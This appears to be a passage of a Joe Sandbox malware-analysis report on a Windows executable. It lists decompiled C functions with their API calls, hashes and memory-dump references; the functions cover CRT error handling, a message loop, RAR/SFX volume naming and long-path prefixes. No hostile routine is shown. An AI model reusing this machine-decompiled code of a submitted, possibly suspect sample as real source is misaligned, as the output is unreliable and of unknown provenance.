                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Time$File$System$Local$SpecificVersion
                • String ID:
                • API String ID: 2092733347-0
                • Opcode ID: 69b75bb7f0068f5c2d282e72f1ce6a854b711647ec6f01d1e522b106db3497a5
                • Instruction ID: 23e6be6687c9216c6eedda38efa31a4e3e774e3046c487477b9304a0e15d922a
                • Opcode Fuzzy Hash: 69b75bb7f0068f5c2d282e72f1ce6a854b711647ec6f01d1e522b106db3497a5
                • Instruction Fuzzy Hash: AF31E675108355ABC700DFA9C98499BBBE8BF9C714F004A2AF995D3250E730D509CBAA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F2AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 83%
                			E003F2AFA(void* __ecx, void* __edx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t16;
				void* _t18;
				void* _t24;
				long _t25;
				void* _t28;

				_t13 = __ecx;
				if( *0x40e7d0 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = E003F3CCD(_t13, __eflags,  *0x40e7d0);
					_t14 = _t24;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E003F3D08(_t14, __eflags,  *0x40e7d0, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t28 = E003F8DC1(_t16);
								_t18 = 1;
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E003F3D08(_t18, __eflags,  *0x40e7d0, 0);
								} else {
									_t8 = E003F3D08(_t18, __eflags,  *0x40e7d0, _t28);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								L003F3E2E(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}













                0x003f2afa
                0x003f2b01
                0x003f2b14
                0x003f2b1b
                0x003f2b1d
                0x003f2b1e
                0x003f2b21
                0x003f2b3a
                0x003f2b3a
                0x003f2b23
                0x003f2b23
                0x003f2b25
                0x003f2b2f
                0x003f2b35
                0x003f2b36
                0x003f2b38
                0x003f2b3f
                0x003f2b48
                0x003f2b4b
                0x003f2b4c
                0x003f2b4e
                0x003f2b62
                0x003f2b62
                0x003f2b6b
                0x003f2b50
                0x003f2b57
                0x003f2b5d
                0x003f2b5e
                0x003f2b60
                0x003f2b74
                0x003f2b76
                0x003f2b76
                0x00000000
                0x00000000
                0x00000000
                0x003f2b60
                0x003f2b79
                0x00000000
                0x00000000
                0x00000000
                0x003f2b38
                0x003f2b25
                0x003f2b81
                0x003f2b8b
                0x003f2b03
                0x003f2b05
                0x003f2b05

                APIs
                • GetLastError.KERNEL32(?,?,003F2AF1,003F02FC,003EFA34), ref: 003F2B08
                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 003F2B16
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003F2B2F
                • SetLastError.KERNEL32(00000000,003F2AF1,003F02FC,003EFA34), ref: 003F2B81
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ErrorLastValue___vcrt_
                • String ID:
                • API String ID: 3852720340-0
                • Opcode ID: 6357f03bb9a6c84db71b3023ff098b5d2738556d289c57c14ab500aea6a9eb14
                • Instruction ID: 06238eda63ba3fa40f6e56d3df40ebe9c5b491033e253337aee742c58bf5a8f0
                • Opcode Fuzzy Hash: 6357f03bb9a6c84db71b3023ff098b5d2738556d289c57c14ab500aea6a9eb14
                • Instruction Fuzzy Hash: 1701D43220D719AEE6172F757D859772F69EF11775B600B3AFB106A1F0EF618C109148
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F97E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 69%
                			E003F97E5(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_push(_t30);
				_t36 = GetLastError();
				_t2 =  *0x40e7fc; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E003FB136(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E003FAEB1(_t20, _t25, _t31, __eflags,  *0x40e7fc, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E003F9649(_t25, _t31, 0x432288);
							E003F8DCC(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E003F8DCC();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E003F8D24(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x40e7fc; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E003FB136(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E003FAEB1(_t21, _t27, _t32, __eflags,  *0x40e7fc, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E003F9649(_t27, _t32, 0x432288);
									E003F8DCC(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E003F8DCC();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E003FAE5B(0, _t25, _t31, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E003FAE5B(__ebx, _t23, _t30, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}






















                0x003f97e5
                0x003f97e5
                0x003f97e5
                0x003f97e8
                0x003f97ef
                0x003f97f1
                0x003f97f6
                0x003f97f9
                0x003f9807
                0x003f980e
                0x003f9813
                0x003f9816
                0x003f9819
                0x003f982b
                0x003f9830
                0x003f9832
                0x003f983d
                0x003f9844
                0x003f9849
                0x003f984c
                0x003f984e
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003f9834
                0x003f9834
                0x00000000
                0x003f9834
                0x003f981b
                0x003f981b
                0x003f981c
                0x003f981c
                0x003f9821
                0x003f985c
                0x003f985d
                0x003f9863
                0x003f9868
                0x003f986b
                0x003f986c
                0x003f986d
                0x003f9874
                0x003f9876
                0x003f9878
                0x003f987d
                0x003f9880
                0x003f988e
                0x003f989a
                0x003f989d
                0x003f98a0
                0x003f98b2
                0x003f98b7
                0x003f98b9
                0x003f98c4
                0x003f98ca
                0x003f98d2
                0x003f98d4
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003f98bb
                0x003f98bb
                0x00000000
                0x003f98bb
                0x003f98a2
                0x003f98a2
                0x003f98a3
                0x003f98a3
                0x003f98d6
                0x003f98d7
                0x003f98d7
                0x003f9882
                0x003f9888
                0x003f988c
                0x003f98df
                0x003f98e0
                0x003f98e6
                0x00000000
                0x00000000
                0x00000000
                0x003f988c
                0x003f98ed
                0x003f98ed
                0x003f97fb
                0x003f9801
                0x003f9805
                0x003f9850
                0x003f9851
                0x003f985b
                0x00000000
                0x00000000
                0x00000000
                0x003f9805

                APIs
                • GetLastError.KERNEL32(?,00411098,003F4674,00411098,?,?,003F40EF,?,?,00411098), ref: 003F97E9
                • _free.LIBCMT ref: 003F981C
                • _free.LIBCMT ref: 003F9844
                • SetLastError.KERNEL32(00000000,?,00411098), ref: 003F9851
                • SetLastError.KERNEL32(00000000,?,00411098), ref: 003F985D
                • _abort.LIBCMT ref: 003F9863
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ErrorLast$_free$_abort
                • String ID:
                • API String ID: 3160817290-0
                • Opcode ID: 7e93a35015f54656b57c778a7d0ecd96b86b895bc3a6bf005c5c74eb8bc14b52
                • Instruction ID: c4e2f2a5502be68617c74e619dcba85218f3c0a96d745436f612dbefcbc040e4
                • Opcode Fuzzy Hash: 7e93a35015f54656b57c778a7d0ecd96b86b895bc3a6bf005c5c74eb8bc14b52
                • Instruction Fuzzy Hash: CEF0A43614060966C7133725BD0AB3B2A698FD27B5F360136F718AA192EE3088014569
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EDC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EDC3B(void* _a4) {
				struct tagMSG _v32;
				long _t7;
				long _t10;

				_t7 = WaitForSingleObject(_a4, 0xa);
				if(_t7 == 0x102) {
					do {
						if(PeekMessageW( &_v32, 0, 0, 0, 0) != 0) {
							GetMessageW( &_v32, 0, 0, 0);
							TranslateMessage( &_v32);
							DispatchMessageW( &_v32);
						}
						_t10 = WaitForSingleObject(_a4, 0xa);
					} while (_t10 == 0x102);
					return _t10;
				}
				return _t7;
			}






                0x003edc47
                0x003edc54
                0x003edc59
                0x003edc69
                0x003edc72
                0x003edc7c
                0x003edc86
                0x003edc86
                0x003edc91
                0x003edc97
                0x00000000
                0x003edc9b
                0x003edc9e

                APIs
                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 003EDC47
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 003EDC61
                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003EDC72
                • TranslateMessage.USER32(?), ref: 003EDC7C
                • DispatchMessageW.USER32(?), ref: 003EDC86
                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 003EDC91
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                • String ID:
                • API String ID: 2148572870-0
                • Opcode ID: 7269bdc6028c80bbbc66490dbae6c2669f197507208d4f06d697438819efddd7
                • Instruction ID: b1e716d79ab288a8fe074fd152f5fa6c221b256cbfd748f7f8eb4a7a999063a1
                • Opcode Fuzzy Hash: 7269bdc6028c80bbbc66490dbae6c2669f197507208d4f06d697438819efddd7
                • Instruction Fuzzy Hash: D8F08C32A01229BBCB206FA1DD4CDCB7F7CEF41792B004121B50AE20A4D635D646C7A0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003DC0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003DC0C5(short* _a4, char _a12) {
				signed short* _v4;
				void* __ebp;
				intOrPtr* _t20;
				signed short* _t24;
				char _t27;
				char _t30;
				signed short* _t31;
				short _t32;
				signed int _t33;
				short _t34;
				signed short* _t37;
				char _t39;
				char _t40;
				char _t41;
				intOrPtr _t44;
				void* _t47;
				void* _t48;
				short* _t54;
				intOrPtr* _t56;
				signed short _t57;
				short* _t58;
				intOrPtr* _t59;
				signed int _t62;
				signed short* _t63;
				short _t66;
				signed short _t67;

				_t58 = _a4;
				_t20 = E003DB92D(_t58);
				_t44 = _a4;
				_t59 = _t20;
				_t68 = _t59;
				if(_t59 != 0) {
					__eflags =  *((intOrPtr*)(_t59 + 2));
					if( *((intOrPtr*)(_t59 + 2)) == 0) {
						L7:
						__eflags = _t44 - (_t59 - _t58 >> 1);
						E003E0602(_t59, L".rar", _t44 - (_t59 - _t58 >> 1));
					} else {
						_t40 = E003E1FBB(_t59, L".exe");
						__eflags = _t40;
						if(_t40 == 0) {
							goto L7;
						} else {
							_t41 = E003E1FBB(_t59, L".sfx");
							__eflags = _t41;
							if(_t41 == 0) {
								goto L7;
							}
						}
					}
				} else {
					E003E05DA(_t68, _t58, L".rar", _t44);
					_t59 = E003DB92D(_t58);
					if(_t59 == 0) {
						L2:
						 *_t58 = 0;
						return 0;
					}
				}
				_t24 = 0x2e;
				_v4 = _t24;
				__eflags =  *_t59 - _t24;
				if( *_t59 != _t24) {
					goto L2;
				}
				__eflags =  *((intOrPtr*)(_t59 + 2));
				if( *((intOrPtr*)(_t59 + 2)) == 0) {
					goto L2;
				}
				__eflags = _a12;
				if(__eflags != 0) {
					_t12 = _t59 + 4; // 0x4
					_t65 = _t12;
					_t27 = E003E047A( *_t12 & 0x0000ffff);
					__eflags = _t27;
					if(_t27 == 0) {
						L30:
						return E003E0602(_t65, L"00", _t44 - (_t59 - _t58 >> 1) - 2);
					}
					_t30 = E003E047A( *(_t59 + 6) & 0x0000ffff);
					__eflags = _t30;
					if(_t30 == 0) {
						goto L30;
					}
					_t31 = E003F3E13(_t59);
					_t47 = 0x3a;
					_t14 = _t31 - 1; // -1
					_t54 = _t59 + _t14 * 2;
					 *_t54 =  *_t54 + 1;
					__eflags =  *_t54 - _t47;
					if( *_t54 == _t47) {
						_t66 = 0x30;
						while(1) {
							__eflags = _t54 - _t58;
							if(_t54 <= _t58) {
								break;
							}
							_t33 =  *(_t54 - 2) & 0x0000ffff;
							_t62 = _t33;
							__eflags = _t33 - _v4;
							if(_t33 == _v4) {
								break;
							}
							 *_t54 = _t66;
							_t34 = _t62 + 1;
							_t54 = _t54 + 0xfffffffe;
							 *_t54 = _t34;
							__eflags = _t34 - _t47;
							if(_t34 == _t47) {
								continue;
							}
							return _t34;
						}
						_t32 = 0x61;
						 *_t54 = _t32;
						return _t32;
					}
				} else {
					_t31 = E003DBA1E(0, __eflags, _t58);
					_t63 = _t31;
					_t48 = 0x3a;
					 *_t63 =  *_t63 + 1;
					__eflags =  *_t63 - _t48;
					if( *_t63 == _t48) {
						_t67 = 0x30;
						while(1) {
							_v4 = _t63;
							 *_t63 = _t67;
							_t63 = _t63 - 2;
							__eflags = _t63 - _t58;
							if(_t63 < _t58) {
								break;
							}
							_t39 = E003E047A( *_t63 & 0x0000ffff);
							__eflags = _t39;
							if(_t39 == 0) {
								break;
							}
							 *_t63 =  *_t63 + 1;
							__eflags =  *_t63 - _t48;
							if( *_t63 == _t48) {
								continue;
							}
							return _t39;
						}
						_t56 = _t58 + E003F3E13(_t58) * 2;
						while(1) {
							__eflags = _t56 - _t63;
							if(_t56 == _t63) {
								break;
							}
							 *((short*)(_t56 + 2)) =  *_t56;
							_t56 = _t56 - 2;
							__eflags = _t56;
						}
						_t37 = _v4;
						_t57 = 0x31;
						 *_t37 = _t57;
						return _t37;
					}
				}
				return _t31;
			}





























                0x003dc0ca
                0x003dc0cf
                0x003dc0d4
                0x003dc0d8
                0x003dc0dc
                0x003dc0de
                0x003dc105
                0x003dc109
                0x003dc129
                0x003dc131
                0x003dc13a
                0x003dc10b
                0x003dc111
                0x003dc116
                0x003dc118
                0x00000000
                0x003dc11a
                0x003dc120
                0x003dc125
                0x003dc127
                0x00000000
                0x00000000
                0x003dc127
                0x003dc118
                0x003dc0e0
                0x003dc0e7
                0x003dc0f2
                0x003dc0f6
                0x003dc0f8
                0x003dc0fa
                0x00000000
                0x003dc0fa
                0x003dc0f6
                0x003dc141
                0x003dc142
                0x003dc146
                0x003dc149
                0x00000000
                0x00000000
                0x003dc14b
                0x003dc14f
                0x00000000
                0x00000000
                0x003dc151
                0x003dc156
                0x003dc1bf
                0x003dc1bf
                0x003dc1c7
                0x003dc1cc
                0x003dc1ce
                0x003dc22f
                0x00000000
                0x003dc23f
                0x003dc1d5
                0x003dc1da
                0x003dc1dc
                0x00000000
                0x00000000
                0x003dc1df
                0x003dc1e7
                0x003dc1e8
                0x003dc1eb
                0x003dc1ee
                0x003dc1f1
                0x003dc1f4
                0x003dc1fc
                0x003dc1fd
                0x003dc1fd
                0x003dc1ff
                0x00000000
                0x00000000
                0x003dc201
                0x003dc205
                0x003dc207
                0x003dc20c
                0x00000000
                0x00000000
                0x003dc20e
                0x003dc211
                0x003dc214
                0x003dc217
                0x003dc21a
                0x003dc21d
                0x00000000
                0x00000000
                0x00000000
                0x003dc21d
                0x003dc226
                0x003dc227
                0x00000000
                0x003dc227
                0x003dc158
                0x003dc159
                0x003dc15e
                0x003dc162
                0x003dc163
                0x003dc166
                0x003dc169
                0x003dc16d
                0x003dc16e
                0x003dc16e
                0x003dc172
                0x003dc175
                0x003dc178
                0x003dc17a
                0x00000000
                0x00000000
                0x003dc180
                0x003dc185
                0x003dc187
                0x00000000
                0x00000000
                0x003dc189
                0x003dc18c
                0x003dc18f
                0x00000000
                0x00000000
                0x00000000
                0x003dc18f
                0x003dc19d
                0x003dc1ac
                0x003dc1ac
                0x003dc1ae
                0x00000000
                0x00000000
                0x003dc1a5
                0x003dc1a9
                0x003dc1a9
                0x003dc1a9
                0x003dc1b0
                0x003dc1b6
                0x003dc1b7
                0x00000000
                0x003dc1b7
                0x003dc169
                0x003dc102

                APIs
                  • Part of subcall function 003E05DA: _wcslen.LIBCMT ref: 003E05E0
                  • Part of subcall function 003DB92D: _wcsrchr.LIBVCRUNTIME ref: 003DB944
                • _wcslen.LIBCMT ref: 003DC197
                • _wcslen.LIBCMT ref: 003DC1DF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcslen$_wcsrchr
                • String ID: .exe$.rar$.sfx
                • API String ID: 3513545583-31770016
                • Opcode ID: 585a7172b6001a95ac59bc17100ac461c3e338edb06a2efd9c5d38e45f497371
                • Instruction ID: 64d3d029230e860a88bba5583a5881cf1c2e4d51c9bc397ec8f8ff99299d9cb9
                • Opcode Fuzzy Hash: 585a7172b6001a95ac59bc17100ac461c3e338edb06a2efd9c5d38e45f497371
                • Instruction Fuzzy Hash: AA41192357036295C737AF64A852A7AB3A8EF41744F151A0FF5816B2C1EB708E81C395
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003DBB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                Download Yara Rule
                C-Code - Quality: 81%
                			E003DBB03(signed short* _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v4096;
				short _v4100;
				void* _t32;
				long _t34;
				void* _t40;
				void* _t55;
				signed short* _t62;
				void* _t65;
				intOrPtr _t67;
				signed short* _t68;
				intOrPtr _t69;

				E003EEC50(0x1000);
				_t68 = _a4;
				_t70 =  *_t68;
				if( *_t68 == 0) {
					L21:
					__eflags = 0;
					return 0;
				}
				E003DBC98(_t70, _t68);
				_t65 = E003F3E13(_t68);
				_t32 = E003DBCC3(_t68);
				_t71 = _t32;
				if(_t32 == 0) {
					_t34 = GetCurrentDirectoryW(0x7ff,  &_v4100);
					__eflags = _t34;
					if(_t34 == 0) {
						goto L21;
					}
					__eflags = _t34 - 0x7ff;
					if(_t34 > 0x7ff) {
						goto L21;
					}
					__eflags = E003DBD9D( *_t68 & 0x0000ffff);
					if(__eflags == 0) {
						E003DB690(__eflags,  &_v4100, 0x800);
						_t40 = E003F3E13( &_v4100);
						_t67 = _a12;
						__eflags = _t67 - _t40 + _t65 + 4;
						if(_t67 <= _t40 + _t65 + 4) {
							goto L21;
						}
						E003E0602(_a8, L"\\\\?\\", _t67);
						E003E05DA(__eflags, _a8,  &_v4100, _t67);
						__eflags =  *_t68 - 0x2e;
						if(__eflags == 0) {
							__eflags = E003DBD9D(_t68[1] & 0x0000ffff);
							if(__eflags != 0) {
								_t68 =  &(_t68[2]);
							}
						}
						L16:
						_push(_t67);
						L5:
						_push(_t68);
						L6:
						_push(_a8);
						E003E05DA(_t73);
						return 1;
					}
					_t14 = _t65 + 6; // 0x6
					_t67 = _a12;
					__eflags = _t67 - _t14;
					if(_t67 <= _t14) {
						goto L21;
					}
					E003E0602(_a8, L"\\\\?\\", _t67);
					__eflags = 0;
					_v4096 = 0;
					E003E05DA(0, _a8,  &_v4100, _t67);
					goto L16;
				}
				if(E003DBC98(_t71, _t68) == 0) {
					_t55 = 0x5c;
					__eflags =  *_t68 - _t55;
					if( *_t68 != _t55) {
						goto L21;
					}
					_t62 =  &(_t68[1]);
					__eflags =  *_t62 - _t55;
					if( *_t62 != _t55) {
						goto L21;
					}
					_t69 = _a12;
					_t10 = _t65 + 6; // 0x6
					__eflags = _t69 - _t10;
					if(_t69 <= _t10) {
						goto L21;
					}
					E003E0602(_a8, L"\\\\?\\", _t69);
					E003E05DA(__eflags, _a8, L"UNC", _t69);
					_push(_t69);
					_push(_t62);
					goto L6;
				}
				_t2 = _t65 + 4; // 0x4
				_t73 = _a12 - _t2;
				if(_a12 <= _t2) {
					goto L21;
				} else {
					E003E0602(_a8, L"\\\\?\\", _a12);
					_push(_a12);
					goto L5;
				}
			}














                0x003dbb0b
                0x003dbb12
                0x003dbb16
                0x003dbb1a
                0x003dbc84
                0x003dbc84
                0x00000000
                0x003dbc84
                0x003dbb21
                0x003dbb2e
                0x003dbb30
                0x003dbb35
                0x003dbb37
                0x003dbbc5
                0x003dbbcb
                0x003dbbcd
                0x00000000
                0x00000000
                0x003dbbd3
                0x003dbbd5
                0x00000000
                0x00000000
                0x003dbbe4
                0x003dbbe6
                0x003dbc2f
                0x003dbc3b
                0x003dbc45
                0x003dbc49
                0x003dbc4b
                0x00000000
                0x00000000
                0x003dbc56
                0x003dbc66
                0x003dbc6b
                0x003dbc6f
                0x003dbc7b
                0x003dbc7d
                0x003dbc7f
                0x003dbc7f
                0x003dbc7d
                0x003dbc1d
                0x003dbc1d
                0x003dbb62
                0x003dbb62
                0x003dbb63
                0x003dbb63
                0x003dbb66
                0x00000000
                0x003dbb6b
                0x003dbbe8
                0x003dbbeb
                0x003dbbee
                0x003dbbf0
                0x00000000
                0x00000000
                0x003dbbff
                0x003dbc04
                0x003dbc06
                0x003dbc18
                0x00000000
                0x003dbc18
                0x003dbb41
                0x003dbb74
                0x003dbb75
                0x003dbb78
                0x00000000
                0x00000000
                0x003dbb7e
                0x003dbb81
                0x003dbb84
                0x00000000
                0x00000000
                0x003dbb8a
                0x003dbb8d
                0x003dbb90
                0x003dbb92
                0x00000000
                0x00000000
                0x003dbba1
                0x003dbbaf
                0x003dbbb4
                0x003dbbb5
                0x00000000
                0x003dbbb5
                0x003dbb43
                0x003dbb46
                0x003dbb49
                0x00000000
                0x003dbb4f
                0x003dbb5a
                0x003dbb5f
                0x00000000
                0x003dbb5f

                APIs
                • _wcslen.LIBCMT ref: 003DBB27
                • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,003DA275,?,?,00000800,?,003DA23A,?,003D755C), ref: 003DBBC5
                • _wcslen.LIBCMT ref: 003DBC3B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcslen$CurrentDirectory
                • String ID: UNC$\\?\
                • API String ID: 3341907918-253988292
                • Opcode ID: 25ae01b58b43fd13de2774e464c1313b793fa80e0c5d86fb44b18ddedea1e94d
                • Instruction ID: 1c593cf1c3baf5425a11fd77f9ccc2e641f99c3c302c80c3586496006c227a03
                • Opcode Fuzzy Hash: 25ae01b58b43fd13de2774e464c1313b793fa80e0c5d86fb44b18ddedea1e94d
                • Instruction Fuzzy Hash: 6341C477400255E6CF23AF21EC01EEBB76DBF45791F124527F814AB291EBB0DA908B50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003ECD58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON
                Download Yara Rule
                C-Code - Quality: 62%
                			E003ECD58(void* __ecx, void* __edx, intOrPtr __esi) {
				intOrPtr _t221;
				intOrPtr _t226;
				void* _t227;
				intOrPtr _t279;
				long _t295;
				signed int _t296;
				void* _t299;
				signed int _t300;
				void* _t304;

				L0:
				while(1) {
					L0:
					 *0x41c577 = 1;
					_t295 = 1;
					_t221 = _t304 - 0x588c;
					_t279 = __esi;
					 *((intOrPtr*)(_t304 - 0x14)) = _t221;
					if( *((short*)(_t304 - 0x588c)) != 0x3c) {
						goto L96;
					}
					L86:
					__eax = __ebp - 0x588a;
					_push(__ebp - 0x588a);
					__eax = E003F22C6(__ecx);
					_pop(__ecx);
					__ecx = 0x3e;
					if(__eax == 0) {
						L95:
						__eax =  *(__ebp - 0x14);
						goto L96;
					}
					L87:
					_t103 = __eax + 2; // 0x2
					__ecx = _t103;
					 *(__ebp - 0x14) = _t103;
					__ecx = 0;
					 *__eax = __cx;
					__eax = __ebp - 0x10c;
					_push(0x64);
					_push(__ebp - 0x10c);
					__eax = __ebp - 0x588a;
					_push(__ebp - 0x588a);
					__eax = E003EAF98();
					 *(__ebp - 0x20) = __eax;
					if(__eax == 0) {
						goto L95;
					}
					L88:
					__esi = __eax;
					while(1) {
						L89:
						if( *(__ebp - 0x10c) == 0) {
							goto L95;
						}
						L90:
